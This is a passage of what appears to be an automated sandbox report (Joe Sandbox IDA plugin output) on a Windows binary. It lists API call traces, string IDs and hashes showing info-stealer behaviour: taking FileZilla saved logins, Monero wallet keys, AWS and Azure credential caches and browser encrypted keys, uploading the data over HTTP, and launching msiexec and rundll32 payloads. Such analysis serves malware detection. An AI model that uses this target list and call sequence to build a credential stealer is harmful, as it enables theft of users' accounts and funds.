                    • lstrcat.KERNEL32(?,00000000), ref: 003C0617
                    • lstrcat.KERNEL32(?,003D1698), ref: 003C0626
                    • lstrcat.KERNEL32(?,003D169C), ref: 003C0635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B59F8
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B5A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B5B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0118FA88,00000000,?,0118E898,00000000,?,003D1A1C), ref: 003B5E71
                    • lstrlen.KERNEL32(00000000), ref: 003B5E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003B5E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B5E9A
                    • lstrlen.KERNEL32(00000000), ref: 003B5EAF
                    • lstrlen.KERNEL32(00000000), ref: 003B5ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B5EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 003B5F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B5F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003B5F4C
                    • InternetCloseHandle.WININET(00000000), ref: 003B5FB0
                    • InternetCloseHandle.WININET(00000000), ref: 003B5FBD
                    • HttpOpenRequestA.WININET(00000000,0118FAA8,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B5BF8
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • InternetCloseHandle.WININET(00000000), ref: 003B5FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 874700897-2180234286
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BCF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003BD0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003BD0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD208
                    • lstrcat.KERNEL32(?,003D1478), ref: 003BD217
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD22A
                    • lstrcat.KERNEL32(?,003D147C), ref: 003BD239
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD24C
                    • lstrcat.KERNEL32(?,003D1480), ref: 003BD25B
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD26E
                    • lstrcat.KERNEL32(?,003D1484), ref: 003BD27D
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD290
                    • lstrcat.KERNEL32(?,003D1488), ref: 003BD29F
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD2B2
                    • lstrcat.KERNEL32(?,003D148C), ref: 003BD2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD2D4
                    • lstrcat.KERNEL32(?,003D1490), ref: 003BD2E3
                      • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                      • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                    • lstrlen.KERNEL32(?), ref: 003BD32A
                    • lstrlen.KERNEL32(?), ref: 003BD339
                      • Part of subcall function 003CAA70: StrCmpCA.SHLWAPI(01188B20,003BA7A7,?,003BA7A7,01188B20), ref: 003CAA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 003BD3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0118DEB8,00000000,?,003D144C,00000000,?,?), ref: 003BCA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003BCA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003BCA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003BCAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003BCAD9
                    • StrStrA.SHLWAPI(?,0118DE40,003D0B52), ref: 003BCAF7
                    • StrStrA.SHLWAPI(00000000,0118DE88), ref: 003BCB1E
                    • StrStrA.SHLWAPI(?,0118E5B0,00000000,?,003D1458,00000000,?,00000000,00000000,?,01188B60,00000000,?,003D1454,00000000,?), ref: 003BCCA2
                    • StrStrA.SHLWAPI(00000000,0118E430), ref: 003BCCB9
                      • Part of subcall function 003BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                      • Part of subcall function 003BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                    • StrStrA.SHLWAPI(?,0118E430,00000000,?,003D145C,00000000,?,00000000,01188B70), ref: 003BCD5A
                    • StrStrA.SHLWAPI(00000000,01188AA0), ref: 003BCD71
                      • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                      • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                      • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                    • lstrlen.KERNEL32(00000000), ref: 003BCE44
                    • CloseHandle.KERNEL32(00000000), ref: 003BCE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • RegOpenKeyExA.ADVAPI32(00000000,0118BB18,00000000,00020019,00000000,003D05B6), ref: 003C83A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                    • wsprintfA.USER32 ref: 003C8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                    • Instruction ID: 13028e42dfaad457788aa40996ee3d8b5e3610394db36a386b73d5a9f1e0bbff
                    • Opcode Fuzzy Hash: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                    • Instruction Fuzzy Hash: 66810BB191021CABDB25DB50CC95FEAB7B8FB18704F008299E109E6140DF756F89CF95
                    APIs
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 003C4DCD
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                      • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 003C4E59
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                      • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                      • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003C4EE5
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49B0
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D08D2), ref: 003C49C5
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49E2
                      • Part of subcall function 003C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003C4A1E
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,0118F9C8), ref: 003C4A4A
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FF8), ref: 003C4A5C
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A70
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FFC), ref: 003C4A82
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A96
                      • Part of subcall function 003C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003C4AAC
                      • Part of subcall function 003C4910: DeleteFileA.KERNEL32(?), ref: 003C4B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 4cbcbda3f44fe0f18f789847b59e399b4d9f5268862a30afc844557061362cfc
                    • Instruction ID: 07ae54efab72d5bcab4c4406b240ff92634864f7e17a3c441e229930cece41e4
                    • Opcode Fuzzy Hash: 4cbcbda3f44fe0f18f789847b59e399b4d9f5268862a30afc844557061362cfc
                    • Instruction Fuzzy Hash: DC4195BA94020867C715F760EC57FED7338AB24704F404899B249EA1C2EEB55BC8DB92
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003C906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                    • Instruction ID: f48e6ab5dd39bdca4e24dc9d973642f6760fd6ad842b3a1210d679fe63cbe52d
                    • Opcode Fuzzy Hash: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                    • Instruction Fuzzy Hash: 8A71EFB1910208ABDB14EFE4DC89FEDB7B8BB58700F108509F515EB294DB78A905DB62
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C31C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C34EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                    • Instruction ID: a7bdadb506d92cc980b89c9d6822fa0941d7b98f906d19175dd8642c7ef55efe
                    • Opcode Fuzzy Hash: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                    • Instruction Fuzzy Hash: 5F12DC7181060C9BDB1AEBA0DC92FEEB778AF14304F50415DE506AA191EF742F4ACF66
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                      • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6303
                      • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                      • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
                      • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                      • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                    • lstrlen.KERNEL32(00000000), ref: 003C532F
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                    • lstrlen.KERNEL32(00000000), ref: 003C5383
                    • lstrlen.KERNEL32(00000000), ref: 003C53AE
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: b21d546346592c44c7efdf5e4d466af3f8902280f001b4c4313ebbe63a690603
                    • Instruction ID: ea5a921ed8e93c0681af48a9e04b22e478cb96aac3ee1c192603527a0b99fc35
                    • Opcode Fuzzy Hash: b21d546346592c44c7efdf5e4d466af3f8902280f001b4c4313ebbe63a690603
                    • Instruction Fuzzy Hash: 4851F77091064CABCB1AFF60D996FEE7B79AF10308F50401CE50A9A592EF346F45DB62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: 5e76e75dcda4a55a7eae68f69c27809ce54b41161f2c4d41d34cce0e1aff1afd
                    • Instruction ID: da108d6892ac1506dd23a30d1dff9ec6cd5b90375ab5de5610126c20032fa511
                    • Opcode Fuzzy Hash: 5e76e75dcda4a55a7eae68f69c27809ce54b41161f2c4d41d34cce0e1aff1afd
                    • Instruction Fuzzy Hash: 85C180B590020D9BCB15EF60DC89FEA7778BB64304F00459DF50AEB241EA74AE85DF92
                    APIs
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C42EC
                    • lstrcat.KERNEL32(?,0118F790), ref: 003C430B
                    • lstrcat.KERNEL32(?,?), ref: 003C431F
                    • lstrcat.KERNEL32(?,0118DF30), ref: 003C4333
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                      • Part of subcall function 003B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C93C0: GlobalAlloc.KERNEL32(00000000,003C43DD,003C43DD), ref: 003C93D3
                    • StrStrA.SHLWAPI(?,0118F700), ref: 003C43F3
                    • GlobalFree.KERNEL32(?), ref: 003C4512
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                      • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                      • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 003C44A3
                    • StrCmpCA.SHLWAPI(?,003D08D1), ref: 003C44C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003C44D2
                    • lstrcat.KERNEL32(00000000,?), ref: 003C44E5
                    • lstrcat.KERNEL32(00000000,003D0FB8), ref: 003C44F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 722158df973bf73a4711717db3198be70f2f40ecab3f4b1f91477a25517365df
                    • Instruction ID: 59273cd2b4ec85681a61bdaded3d002759ff28ee88f96a89211b363c21faff39
                    • Opcode Fuzzy Hash: 722158df973bf73a4711717db3198be70f2f40ecab3f4b1f91477a25517365df
                    • Instruction Fuzzy Hash: FF7166B6900208ABCB15EBA0DC99FEE7379AB58304F00459CF609E7181DA75DB49DF92
                    APIs
                      • Part of subcall function 003B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                      • Part of subcall function 003B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                      • Part of subcall function 003B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                      • Part of subcall function 003B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                      • Part of subcall function 003B12A0: RegCloseKey.ADVAPI32(?), ref: 003B12FF
                    • lstrcat.KERNEL32(?,00000000), ref: 003B134F
                    • lstrlen.KERNEL32(?), ref: 003B135C
                    • lstrcat.KERNEL32(?,.keys), ref: 003B1377
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003B1465
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 003B14EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: d52475744d00dbf7fa972ae67c139222e34d98003370fa283fe229e0e1717085
                    • Instruction ID: 45c0d21c0da898d99a5922f16e445806e22a39229f30f2f91bb527b7690428c6
                    • Opcode Fuzzy Hash: d52475744d00dbf7fa972ae67c139222e34d98003370fa283fe229e0e1717085
                    • Instruction Fuzzy Hash: 94512FB295061C57CB16EB60DC96FED737CAB54304F40459CB60AE6092EE306F89CBA6
                    APIs
                      • Part of subcall function 003B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                      • Part of subcall function 003B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                      • Part of subcall function 003B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                      • Part of subcall function 003B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                      • Part of subcall function 003B72D0: HeapFree.KERNEL32(00000000), ref: 003B7459
                    • lstrcat.KERNEL32(00000000,003D17FC), ref: 003B7606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003B7648
                    • lstrcat.KERNEL32(00000000, : ), ref: 003B765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003B768F
                    • lstrcat.KERNEL32(00000000,003D1804), ref: 003B76A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003B76D3
                    • lstrcat.KERNEL32(00000000,003D1808), ref: 003B76ED
                    • task.LIBCPMTD ref: 003B76FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
